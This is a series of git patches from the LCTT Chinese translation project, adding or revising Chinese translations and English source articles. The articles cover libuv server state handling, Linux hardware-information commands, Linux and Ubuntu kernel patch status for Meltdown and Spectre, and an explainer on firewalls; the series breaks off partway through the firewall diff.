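+这个示意是一个简化的假设性骨架(其中的 `peer_state_t` 字段以及 `on_alloc`、`on_read` 等回调名称都是为了演示而虚构的,并非原文的完整实现),它演示了如何把堆上分配的状态挂在句柄的 `data` 字段上、在回调中取回它,并在关闭句柄时释放它以避免泄漏:
+
+```
+#include <stdlib.h>
+#include <uv.h>
+
+// 每个客户端的状态(字段仅为示意)
+typedef struct {
+  int bytes_seen;
+} peer_state_t;
+
+static void on_alloc(uv_handle_t* handle, size_t suggested_size, uv_buf_t* buf) {
+  buf->base = (char*)malloc(suggested_size);
+  buf->len = suggested_size;
+}
+
+static void on_client_closed(uv_handle_t* handle) {
+  free(handle->data);  // 释放挂在 data 字段上的堆分配状态,避免泄漏
+  free(handle);
+}
+
+static void on_read(uv_stream_t* client, ssize_t nread, const uv_buf_t* buf) {
+  // 通过 data 字段取回这个客户端的状态
+  peer_state_t* state = (peer_state_t*)client->data;
+  if (nread > 0) {
+    state->bytes_seen += (int)nread;
+  } else if (nread < 0) {
+    uv_close((uv_handle_t*)client, on_client_closed);
+  }
+  if (buf->base != NULL) {
+    free(buf->base);
+  }
+}
+
+void on_peer_connected(uv_stream_t* server_stream, int status) {
+  if (status < 0) {
+    return;
+  }
+  uv_tcp_t* client = (uv_tcp_t*)malloc(sizeof(uv_tcp_t));
+  uv_tcp_init(uv_default_loop(), client);
+  client->data = NULL;
+
+  if (uv_accept(server_stream, (uv_stream_t*)client) == 0) {
+    // 在堆上分配状态并挂到句柄上,之后的回调据此知道自己在处理哪个客户端
+    client->data = calloc(1, sizeof(peer_state_t));
+    uv_read_start((uv_stream_t*)client, on_alloc, on_read);
+  } else {
+    uv_close((uv_handle_t*)client, on_client_closed);
+  }
+}
+```
+
+这里的关键点是:状态的生命周期跟着句柄走,释放动作放在 `uv_close()` 的关闭回调里,这正是上面所说的“需要知道何时可以安全释放数据”的一种常见做法。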
这个服务器上对端的状态如下:
@@ -479,11 +475,11 @@ via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/
[4]:https://eli.thegreenplace.net/tag/concurrency
[5]:https://eli.thegreenplace.net/tag/c-c
[6]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id4
-[7]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/
-[8]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/
-[9]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/
+[7]:https://linux.cn/article-8993-1.html
+[8]:https://linux.cn/article-9002-1.html
+[9]:https://linux.cn/article-9117-1.html
[10]:http://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/
-[11]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/
+[11]:https://linux.cn/article-9117-1.html
[12]:http://libuv.org/
[13]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-server.c
[14]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id5
From 4d0e68750480f34496d2ead9c3600e2840c8ba6e Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 10:10:19 +0800
Subject: [PATCH 155/371] PRF&PUB:20170515 Commands to check System & Hardware
Information.md
@geekpi
---
... to check System & Hardware Information.md | 63 ++++++++++++-------
1 file changed, 40 insertions(+), 23 deletions(-)
rename {translated/tech => published}/20170515 Commands to check System & Hardware Information.md (64%)
diff --git a/translated/tech/20170515 Commands to check System & Hardware Information.md b/published/20170515 Commands to check System & Hardware Information.md
similarity index 64%
rename from translated/tech/20170515 Commands to check System & Hardware Information.md
rename to published/20170515 Commands to check System & Hardware Information.md
index e8469797c6..ba947a7f43 100644
--- a/translated/tech/20170515 Commands to check System & Hardware Information.md
+++ b/published/20170515 Commands to check System & Hardware Information.md
@@ -1,84 +1,101 @@
检查系统和硬件信息的命令
======
-你们好,linux 爱好者们,在这篇文章中,我将讨论一些作为系统管理员重要的事。众所周知,作为一名优秀的系统管理员意味着要了解有关 IT 基础架构的所有信息,并掌握有关服务器的所有信息,无论是硬件还是操作系统。所以下面的命令将帮助你了解所有的硬件和系统信息。
-#### 1- 查看系统信息
+你们好,Linux 爱好者们,在这篇文章中,我将讨论一些对系统管理员来说很重要的事。众所周知,作为一名优秀的系统管理员意味着要了解有关 IT 基础架构的所有信息,并掌握有关服务器的所有信息,无论是硬件还是操作系统。所以下面的命令将帮助你了解所有的硬件和系统信息。
+### 1 查看系统信息
+
+```
$ uname -a
+```
![uname command][2]
它会为你提供有关系统的所有信息。它会为你提供系统的内核名、主机名、内核版本、内核发布号、硬件名称。
-#### 2- 查看硬件信息
+### 2 查看硬件信息
+```
$ lshw
+```
![lshw command][4]
-使用 lshw 将在屏幕上显示所有硬件信息。
+使用 `lshw` 将在屏幕上显示所有硬件信息。
-#### 3- 查看块设备(硬盘、闪存驱动器)信息
+### 3 查看块设备(硬盘、闪存驱动器)信息
+```
$ lsblk
+```
![lsblk command][6]
-lsblk 命令在屏幕上打印关于块设备的所有信息。使用 lsblk -a 显示所有块设备。
+`lsblk` 命令在屏幕上打印关于块设备的所有信息。使用 `lsblk -a` 可以显示所有块设备。
-#### 4- 查看 CPU 信息
+### 4 查看 CPU 信息
+```
$ lscpu
+```
![lscpu command][8]
-lscpu 在屏幕上显示所有 CPU 信息。
+`lscpu` 在屏幕上显示所有 CPU 信息。
-#### 5- 查看 PCI 信息
+### 5 查看 PCI 信息
+```
$ lspci
+```
![lspci command][10]
-所有的网络适配器卡、USB 卡、图形卡都被称为 PCI。要查看他们的信息使用 lspci。
+所有的网络适配器卡、USB 卡、图形卡都被称为 PCI 设备。要查看它们的信息,请使用 `lspci`。
-lspci -v 将提供有关 PCI 卡的详细信息。
+`lspci -v` 将提供有关 PCI 卡的详细信息。
-lspci -t 会以树形格式显示它们。
+`lspci -t` 会以树形格式显示它们。
-#### 6- 查看 USB 信息
+### 6 查看 USB 信息
+```
$ lsusb
+```
![lsusb command][12]
-要查看有关连接到机器的所有 USB 控制器和设备的信息,我们使用 lsusb。
+要查看有关连接到机器的所有 USB 控制器和设备的信息,我们使用 `lsusb`。
-#### 7- 查看 SCSI 信息
+### 7 查看 SCSI 信息
-$ lssci
+```
+$ lsscsi
+```
-![lssci][14]
+![lsscsi][14]
-要查看 SCSI 信息输入 lsscsi。lsscsi -s 会显示分区的大小。
+要查看 SCSI 信息输入 `lsscsi`。`lsscsi -s` 会显示分区的大小。
-#### 8- 查看文件系统信息
+### 8 查看文件系统信息
+```
$ fdisk -l
+```
![fdisk command][16]
-使用 fdisk -l 将显示有关文件系统的信息。虽然 fdisk 的主要功能是修改文件系统,但是也可以创建新分区,删除旧分区(详情在我以后的教程中)。
+使用 `fdisk -l` 将显示有关文件系统的信息。虽然 `fdisk` 的主要功能是修改文件系统,但是也可以创建新分区,删除旧分区(详情在我以后的教程中)。
-就是这些了,我的 Linux 爱好者们。建议你在**[这里][17]**和**[这里][18]**查看我文章中关于另外的 Linux 命令。
+就是这些了,我的 Linux 爱好者们。建议你在**[这里][17]**和**[这里][18]**的文章中查看关于另外的 Linux 命令。
--------------------------------------------------------------------------------
via: http://linuxtechlab.com/commands-system-hardware-info/
作者:[Shusain][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
+译者:[geekpi](https://github.com/geekpi)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 56ceb13979f92917ee9103f2837c129fd3f3939b Mon Sep 17 00:00:00 2001
From: Ezio
Date: Mon, 8 Jan 2018 10:32:11 +0800
Subject: [PATCH 156/371] =?UTF-8?q?20180108-1=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...eltdown and Spectre Linux Kernel Status.md | 101 ++++++++++++++++++
1 file changed, 101 insertions(+)
create mode 100644 sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
diff --git a/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md b/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
new file mode 100644
index 0000000000..1ade61bd3a
--- /dev/null
+++ b/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
@@ -0,0 +1,101 @@
+Meltdown and Spectre Linux Kernel Status
+============================================================
+
+
+By now, everyone knows that something “big” just got announced regarding computer security. Heck, when the [Daily Mail does a report on it][1] , you know something is bad…
+
+Anyway, I’m not going to go into the details about the problems being reported, other than to point you at the wonderfully written [Project Zero paper on the issues involved here][2]. They should just give out the 2018 [Pwnie][3] award right now, it’s that amazingly good.
+
+If you do want technical details for how we are resolving those issues in the kernel, see the always awesome [lwn.net writeup for the details][4].
+
+Also, here’s a good summary of [lots of other postings][5] that includes announcements from various vendors.
+
+As for how this was all handled by the companies involved, well this could be described as a textbook example of how _NOT_ to interact with the Linux kernel community properly. The people and companies involved know what happened, and I’m sure it will all come out eventually, but right now we need to focus on fixing the issues involved, and not pointing blame, no matter how much we want to.
+
+### What you can do right now
+
+If your Linux systems are running a normal Linux distribution, go update your kernel. They should all have the updates in them already. And then keep updating them over the next few weeks, we are still working out lots of corner case bugs given that the testing involved here is complex given the huge variety of systems and workloads this affects. If your distro does not have kernel updates, then I strongly suggest changing distros right now.
+
+However there are lots of systems out there that are not running “normal” Linux distributions for various reasons (rumor has it that it is way more than the “traditional” corporate distros). They rely on the LTS kernel updates, or the normal stable kernel updates, or they are in-house franken-kernels. For those people here’s the status of what is going on regarding all of this mess in the upstream kernels you can use.
+
+### Meltdown – x86
+
+Right now, Linus’s kernel tree contains all of the fixes we currently know about to handle the Meltdown vulnerability for the x86 architecture. Go enable the CONFIG_PAGE_TABLE_ISOLATION kernel build option, and rebuild and reboot and all should be fine.
+
+However, Linus’s tree is currently at 4.15-rc6 + some outstanding patches. 4.15-rc7 should be out tomorrow, with those outstanding patches to resolve some issues, but most people do not run a -rc kernel in a “normal” environment.
+
+Because of this, the x86 kernel developers have done a wonderful job in their development of the page table isolation code, so much so that the backport to the latest stable kernel, 4.14, has been almost trivial for me to do. This means that the latest 4.14 release (4.14.12 at this moment in time), is what you should be running. 4.14.13 will be out in a few more days, with some additional fixes in it that are needed for some systems that have boot-time problems with 4.14.12 (it’s an obvious problem, if it does not boot, just add the patches now queued up.)
+
+I would personally like to thank Andy Lutomirski, Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, Peter Zijlstra, Josh Poimboeuf, Juergen Gross, and Linus Torvalds for all of the work they have done in getting these fixes developed and merged upstream in a form that was so easy for me to consume to allow the stable releases to work properly. Without that effort, I don’t even want to think about what would have happened.
+
+For the older long term stable (LTS) kernels, I have leaned heavily on the wonderful work of Hugh Dickins, Dave Hansen, Jiri Kosina and Borislav Petkov to bring the same functionality to the 4.4 and 4.9 stable kernel trees. I had also had immense help from Guenter Roeck, Kees Cook, Jamie Iles, and many others in tracking down nasty bugs and missing patches. I want to also call out David Woodhouse, Eduardo Valentin, Laura Abbott, and Rik van Riel for their help with the backporting and integration as well, their help was essential in numerous tricky places.
+
+These LTS kernels also have the CONFIG_PAGE_TABLE_ISOLATION build option that should be enabled to get complete protection.
+
+As this backport is very different from the mainline version that is in 4.14 and 4.15, there are different bugs happening, right now we know of some VDSO issues that are getting worked on, and some odd virtual machine setups are reporting strange errors, but those are the minority at the moment, and should not stop you from upgrading at all right now. If you do run into problems with these releases, please let us know on the stable kernel mailing list.
+
+If you rely on any other kernel tree other than 4.4, 4.9, or 4.14 right now, and you do not have a distribution supporting you, you are out of luck. The lack of patches to resolve the Meltdown problem is so minor compared to the hundreds of other known exploits and bugs that your kernel version currently contains. You need to worry about that more than anything else at this moment, and get your systems up to date first.
+
+Also, go yell at the people who forced you to run an obsoleted and insecure kernel version, they are the ones that need to learn that doing so is a totally reckless act.
+
+### Meltdown – ARM64
+
+Right now the ARM64 set of patches for the Meltdown issue are not merged into Linus’s tree. They are [staged and ready to be merged][6] into 4.16-rc1 once 4.15 is released in a few weeks. Because these patches are not in a released kernel from Linus yet, I can not backport them into the stable kernel releases (hey, we have [rules][7] for a reason…)
+
+Due to them not being in a released kernel, if you rely on ARM64 for your systems (i.e. Android), I point you at the [Android Common Kernel tree][8]. All of the ARM64 fixes have been merged into the [3.18,][9] [4.4,][10] and [4.9 branches][11] as of this point in time.
+
+I would strongly recommend just tracking those branches as more fixes get added over time due to testing and things catch up with what gets merged into the upstream kernel releases over time, especially as I do not know when these patches will land in the stable and LTS kernel releases at this point in time.
+
+For the 4.4 and 4.9 LTS kernels, odds are these patches will never get merged into them, due to the large number of prerequisite patches required. All of those prerequisite patches have been long merged and tested in the android-common kernels, so I think it is a better idea to just rely on those kernel branches instead of the LTS release for ARM systems at this point in time.
+
+Also note, I merge all of the LTS kernel updates into those branches usually within a day or so of being released, so you should be following those branches no matter what, to ensure your ARM systems are up to date and secure.
+
+### Spectre
+
+Now things get “interesting”…
+
+Again, if you are running a distro kernel, you _might_ be covered as some of the distros have merged various patches into them that they claim mitigate most of the problems here. I suggest updating and testing for yourself to see if you are worried about this attack vector
+
+For upstream, well, the status is that there are no fixes merged into any upstream tree for these types of issues yet. There are numerous patches floating around on the different mailing lists that are proposing solutions for how to resolve them, but they are under heavy development, some of the patch series do not even build or apply to any known trees, the series conflict with each other, and it’s a general mess.
+
+This is due to the fact that the Spectre issues were the last to be addressed by the kernel developers. All of us were working on the Meltdown issue, and we had no real information on exactly what the Spectre problem was at all, and what patches were floating around were in even worse shape than what have been publicly posted.
+
+Because of all of this, it is going to take us in the kernel community a few weeks to resolve these issues and get them merged upstream. The fixes are coming in to various subsystems all over the kernel, and will be collected and released in the stable kernel updates as they are merged, so again, you are best off just staying up to date with either your distribution’s kernel releases, or the LTS and stable kernel releases.
+
+It’s not the best news, I know, but it’s reality. If it’s any consolation, it does not seem that any other operating system has full solutions for these issues either, the whole industry is in the same boat right now, and we just need to wait and let the developers solve the problem as quickly as they can.
+
+The proposed solutions are not trivial, but some of them are amazingly good. The [Retpoline][12] post from Paul Turner is an example of some of the new concepts being created to help resolve these issues. This is going to be an area of lots of research over the next years to come up with ways to mitigate the potential problems involved in hardware that wants to try to predict the future before it happens.
+
+### Other arches
+
+Right now, I have not seen patches for any other architectures than x86 and arm64. There are rumors of patches floating around in some of the enterprise distributions for some of the other processor types, and hopefully they will surface in the weeks to come to get merged properly upstream. I have no idea when that will happen; if you are dependent on a specific architecture, I suggest asking on the arch-specific mailing list about this to get a straight answer.
+
+### Conclusion
+
+Again, update your kernels, don’t delay, and don’t stop. The updates to resolve these problems will be continuing to come for a long period of time. Also, there are still lots of other bugs and security issues being resolved in the stable and LTS kernel releases that are totally independent of these types of issues, so keeping up to date is always a good idea.
+
+Right now, there are a lot of very overworked, grumpy, sleepless, and just generally pissed off kernel developers working as hard as they can to resolve these issues that they themselves did not cause at all. Please be considerate of their situation right now. They need all the love and support and free supply of their favorite beverage that we can provide them to ensure that we all end up with fixed systems as soon as possible.
+
+--------------------------------------------------------------------------------
+
+via: http://kroah.com/log/blog/2018/01/06/meltdown-status/
+
+作者:[Greg Kroah-Hartman][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://kroah.com
+[1]:http://www.dailymail.co.uk/sciencetech/article-5238789/Intel-says-security-updates-fix-Meltdown-Spectre.html
+[2]:https://googleprojectzero.blogspot.fr/2018/01/reading-privileged-memory-with-side.html
+[3]:https://pwnies.com/
+[4]:https://lwn.net/Articles/743265/
+[5]:https://lwn.net/Articles/742999/
+[6]:https://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux.git/log/?h=kpti
+[7]:https://www.kernel.org/doc/html/latest/process/stable-kernel-rules.html
+[8]:https://android.googlesource.com/kernel/common/
+[9]:https://android.googlesource.com/kernel/common/+/android-3.18
+[10]:https://android.googlesource.com/kernel/common/+/android-4.4
+[11]:https://android.googlesource.com/kernel/common/+/android-4.9
+[12]:https://support.google.com/faqs/answer/7625886
From 4b88013499c9b1092d1cb03a5cbb2680d1bac2a1 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Mon, 8 Jan 2018 10:50:45 +0800
Subject: [PATCH 157/371] Translating by stevenzdg988
---
.../tech/20171030 How To Create Custom Ubuntu Live CD Image.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md b/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
index 71c65f4ac0..610efc8739 100644
--- a/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
+++ b/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
@@ -1,4 +1,4 @@
-How To Create Custom Ubuntu Live CD Image
+Translating by stevenzdg988 on How To Create Custom Ubuntu Live CD Image
======
![](https://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-720x340.png)
From 714a953dc01a9808adf205f7c6a22f502ca1e4c4 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Mon, 8 Jan 2018 11:21:40 +0800
Subject: [PATCH 158/371] =?UTF-8?q?20180108-2=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...or the Meltdown Spectre Vulnerabilities.md | 74 +++++++++++++++++++
1 file changed, 74 insertions(+)
create mode 100644 sources/tech/20180104 Ubuntu Updates for the Meltdown Spectre Vulnerabilities.md
diff --git a/sources/tech/20180104 Ubuntu Updates for the Meltdown Spectre Vulnerabilities.md b/sources/tech/20180104 Ubuntu Updates for the Meltdown Spectre Vulnerabilities.md
new file mode 100644
index 0000000000..c44d121e68
--- /dev/null
+++ b/sources/tech/20180104 Ubuntu Updates for the Meltdown Spectre Vulnerabilities.md
@@ -0,0 +1,74 @@
+Ubuntu Updates for the Meltdown / Spectre Vulnerabilities
+============================================================
+
+![](https://insights.ubuntu.com/wp-content/uploads/0372/Screenshot-from-2018-01-04-12-39-25.png)
+
+* For up-to-date patch, package, and USN links, please refer to: [https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown][2]
+
+Unfortunately, you’ve probably already read about one of the most widespread security issues in modern computing history — colloquially known as “[Meltdown][5]” ([CVE-2017-5754][6]) and “[Spectre][7]” ([CVE-2017-5753][8] and [CVE-2017-5715][9]) — affecting practically every computer built in the last 10 years, running any operating system. That includes [Ubuntu][10].
+
+I say “unfortunately”, in part because there was a coordinated release date of January 9, 2018, agreed upon by essentially every operating system, hardware, and cloud vendor in the world. By design, operating system updates would be available at the same time as the public disclosure of the security vulnerability. While it happens rarely, this is an industry standard best practice, which has broken down in this case.
+
+At its heart, this vulnerability is a CPU hardware architecture design issue. But there are billions of affected hardware devices, and replacing CPUs is simply unreasonable. As a result, operating system kernels — Windows, MacOS, Linux, and many others — are being patched to mitigate the critical security vulnerability.
+
+Canonical engineers have been working on this since we were made aware under the embargoed disclosure (November 2017) and have worked through the Christmas and New Years holidays, testing and integrating an incredibly complex patch set into a broad set of Ubuntu kernels and CPU architectures.
+
+Ubuntu users of the 64-bit x86 architecture (aka, amd64) can expect updated kernels by the original January 9, 2018 coordinated release date, and sooner if possible. Updates will be available for:
+
+* Ubuntu 17.10 (Artful) — Linux 4.13 HWE
+
+* Ubuntu 16.04 LTS (Xenial) — Linux 4.4 (and 4.4 HWE)
+
+* Ubuntu 14.04 LTS (Trusty) — Linux 3.13
+
+* Ubuntu 12.04 ESM** (Precise) — Linux 3.2
+ * Note that an [Ubuntu Advantage license][1] is required for the 12.04 ESM kernel update, as Ubuntu 12.04 LTS is past its end-of-life
+
+Ubuntu 18.04 LTS (Bionic) will release in April of 2018, and will ship a 4.15 kernel, which includes the [KPTI][11] patchset as integrated upstream.
+
+Ubuntu optimized kernels for the Amazon, Google, and Microsoft public clouds are also covered by these updates, as well as the rest of Canonical’s [Certified Public Clouds][12] including Oracle, OVH, Rackspace, IBM Cloud, Joyent, and Dimension Data.
+
+These kernel fixes will not be [Livepatch-able][13]. The source code changes required to address this problem are comprised of hundreds of independent patches, touching hundreds of files and thousands of lines of code. The sheer complexity of this patchset is not compatible with the Linux kernel Livepatch mechanism. An update and a reboot will be required to activate this update.
+
+Furthermore, you can expect Ubuntu security updates for a number of other related packages, including CPU microcode, GCC and QEMU in the coming days.
+
+We don’t have a performance analysis to share at this time, but please do stay tuned here as we’ll follow up with that as soon as possible.
+
+Thanks,
+[@DustinKirkland][14]
+VP of Product
+Canonical / Ubuntu
+
+### About the author
+
+ ![Dustin's photo](https://insights.ubuntu.com/wp-content/uploads/6f45/kirkland.jpg)
+
+Dustin Kirkland is part of Canonical's Ubuntu Product and Strategy team, working for Mark Shuttleworth, and leading the technical strategy, road map, and life cycle of the Ubuntu Cloud and IoT commercial offerings. Formerly the CTO of Gazzang, a venture funded start-up acquired by Cloudera, Dustin designed and implemented an innovative key management system for the cloud, called zTrustee, and delivered comprehensive security for cloud and big data platforms with eCryptfs and other encryption technologies. Dustin is an active Core Developer of the Ubuntu Linux distribution, maintainer of 20+ open source projects, and the creator of Byobu, DivItUp.com, and LinuxSearch.org. A Fightin' Texas Aggie Class of 2001 graduate, Dustin lives in Austin, Texas, with his wife Kim, daughters, and his Australian Shepherds, Aggie and Tiger. Dustin is also an avid home brewer.
+
+[More articles by Dustin][3]
+
+--------------------------------------------------------------------------------
+
+via: https://insights.ubuntu.com/2018/01/04/ubuntu-updates-for-the-meltdown-spectre-vulnerabilities/
+
+作者:[Dustin Kirkland][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://insights.ubuntu.com/author/kirkland/
+[1]:https://www.ubuntu.com/support/esm
+[2]:https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown
+[3]:https://insights.ubuntu.com/author/kirkland/
+[4]:https://insights.ubuntu.com/author/kirkland/
+[5]:https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)
+[6]:https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5754.html
+[7]:https://en.wikipedia.org/wiki/Spectre_(security_vulnerability)
+[8]:https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5753.html
+[9]:https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5715.html
+[10]:https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown
+[11]:https://lwn.net/Articles/742404/
+[12]:https://partners.ubuntu.com/programmes/public-cloud
+[13]:https://www.ubuntu.com/server/livepatch
+[14]:https://twitter.com/dustinkirkland
From 516c7a2002e1ed9b54a25f03b412f935a5259ad3 Mon Sep 17 00:00:00 2001
From: zjon
Date: Mon, 8 Jan 2018 12:24:19 +0800
Subject: [PATCH 159/371] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=88=90?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171011 What is a firewall.md | 73 ++++++++++-----------
1 file changed, 35 insertions(+), 38 deletions(-)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index 3401995721..df864cf54c 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,78 +1,75 @@
Translating by zjon
-What is a firewall?
-======
-Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
+什么是防火墙?
+=====
+基于网络的防火墙凭借其在抵御日益增多的各种威胁方面久经考验的防御能力,已经在美国企业中几乎无处不在。
-A recent study by network testing firm NSS Labs found that up to 80% of US large businesses run a next-generation firewall. Research firm IDC estimates the firewall and related unified threat management market was a $7.6 billion industry in 2015 and expected to reach $12.7 billion by 2020.
+网络测试公司 NSS 实验室最近的一项研究发现,高达 80% 的美国大型企业运行着下一代防火墙。研究公司 IDC 估计,防火墙和相关的统一威胁管理市场在 2015 年的规模为 76 亿美元,预计到 2020 年将达到 127 亿美元。
- **[ If you 're upgrading, here's [What to consider when deploying a next generation firewall][1].]**
+**如果你正在升级,请参阅 [What to consider when deploying a next generation firewall][1]。**
-### What is a firewall?
+### 什么是防火墙?
-Firewalls act as a perimeter defense tool that monitor traffic and either allow it or block it. Over the years functionality of firewalls has increased, and now most firewalls can not only block a set of known threats and enforce advanced access control list policies, but they can also deeply inspect individual packets of traffic and test packets to determine if they're safe. Most firewalls are deployed as network hardware that processes traffic and software that allow end users to configure and manage the system. Increasingly, software-only versions of firewalls are being deployed in highly virtualized environments to enforce policies on segmented networks or in the IaaS public cloud.
+防火墙是一种监控流量的边界防御工具,它要么放行流量,要么屏蔽流量。多年来,防火墙的功能不断增强,现在大多数防火墙不仅可以阻止一组已知的威胁、执行高级的访问控制列表策略,还可以深入检查各个流量包并对其进行测试,以确定它们是否安全。大多数防火墙以网络硬件的形式部署,由硬件处理流量,并配有供终端用户配置和管理系统的软件。越来越多的纯软件防火墙被部署到高度虚拟化的环境中,以便在被隔离的网络分段或 IaaS 公有云中执行策略。
-Advancements in firewall technology have created new options firewall deployments over the past decade, so now there are a handful of options for end users looking to deploy a firewall. These include:
+过去十年里,防火墙技术的进步创造了新的防火墙部署方式,因此现在想要部署防火墙的最终用户有了多种选择。这些选择包括:
-### Stateful firewalls
+### 有状态的防火墙
+当防火墙最初被创造出来时,它们是无状态的,也就是说,流量所经过的硬件会单独地检查每一个被监视的网络数据包,并单独地屏蔽或放行它。从 1990 年代中后期开始,防火墙的第一个重大进展是引入了状态。有状态防火墙在更全面的上下文中检查流量,同时考虑到网络连接的工作状态和特性,从而让防火墙更加全面。例如,维持这个状态可以让防火墙允许某些流量访问特定的用户,同时对其他用户阻塞同样的流量。
-When firewalls were first created they were stateless, meaning that the hardware that the traffic traverse through while being inspected monitored each packet of network traffic individually and either blocking or allowing it in isolation. Beginning in the mid to late 1990s, the first major advancements in firewalls was the introduction of state. Stateful firewalls examine traffic in a more holistic context, taking into account the operating state and characteristics of the network connection to provide a more holistic firewall. Maintaining this state allows the firewall to allow certain traffic to access certain users while blocking at same traffic to other users, for example.
+### 下一代防火墙
+多年来,防火墙增加了许多新的特性,包括深度包检查、入侵检测和防御,以及对加密流量的检查。下一代防火墙(NGFW)是指把许多这类先进功能集成进来的防火墙。
-### Next-generation firewalls
+### 基于代理的防火墙
-Over the years firewalls have added myriad new features, including deep packet inspection, intrusion detection and prevention and inspection of encrypted traffic. Next-generation firewalls (NGFWs) refer to firewalls that have integrated many of these advanced features into the firewall.
+这些防火墙充当请求数据的最终用户和数据源之间的网关。在传递给最终用户之前,所有的流量都通过这个代理过滤。这通过掩饰信息的原始请求者的身份来保护客户端不受威胁。
-### Proxy-based firewalls
+### Web 应用防火墙
-These firewalls act as a gateway between end users who request data and the source of that data. All traffic is filtered through this proxy before being passed on to the end user. This protects the client from exposure to threats by masking the identity of the original requester of the information.
+这些防火墙位于特定应用程序的前面,而不是位于更广阔的网络的入口或出口上。基于代理的防火墙通常被认为是在保护终端客户,而 WAF 通常被认为是在保护应用服务器。
-### Web application firewalls
+### 防火墙硬件
-These firewalls sit in front of specific applications as opposed to sitting on an entry or exit point of a broader network. Whereas proxy-based firewalls are typically thought of as protecting end-user clients, WAFs are typically thought of as protecting the application servers.
+防火墙硬件通常是一个简单的服务器,它可以充当路由器来过滤流量和运行防火墙软件。这些设备放置在企业网络的边缘,路由器和 Internet 服务提供商的连接点之间。通常企业可能在整个数据中心部署十几个物理防火墙。 用户需要根据用户基数的大小和 Internet 连接的速率来确定防火墙需要支持的吞吐量容量。
-### Firewall hardware
+### 防火墙软件
-Firewall hardware is typically a straightforward server that can act as a router for filtering traffic and running firewall software. These devices are placed at the edge of a corporate network, between a router and the Internet service provider's connection point. A typical enterprise may deploy dozens of physical firewalls throughout a data center. Users need to determine what throughput capacity they need the firewall to support based on the size of the user base and speed of the Internet connection.
+通常,终端用户部署多个防火墙硬件端和一个中央防火墙软件系统来管理部署。 这个中心系统是配置策略和特性的地方,在那里可以进行分析,并可以对威胁作出响应。
-### Firewall software
+### 下一代防火墙
-Typically end users deploy multiple firewall hardware endpoints and a central firewall software system to manage the deployment. This central system is where policies and features are configured, where analysis can be done and threats can be responded to.
+多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测以及对加密流量的预防和检查。下一代防火墙(NGFWs)是指集成了这些先进功能的防火墙,这里描述的是它们中的一些。
-### Next-generation firewalls
+### 有状态的检测
-Over the years firewalls have added myriad new features, including deep packet inspection, intrusion detection and prevention and inspection of encrypted traffic. Next-generation firewalls (NGFWs) refer to firewalls that have integrated many of these advanced features, and here is a description of some of them.
+阻止已知不需要的流量,这是基本的防火墙功能。
-### Stateful inspection
+### 抵御病毒
-This is the basic firewall functionality in which the device blocks known unwanted traffic
+这个功能会在网络流量中搜索已知的病毒和漏洞,它依靠防火墙接收关于最新威胁的更新,并不断更新以抵御这些威胁。
-### Anti-virus
+### 入侵防御系统
-This functionality that searches for known virus and vulnerabilities in network traffic is aided by the firewall receiving updates on the latest threats and being constantly updated to protect against them.
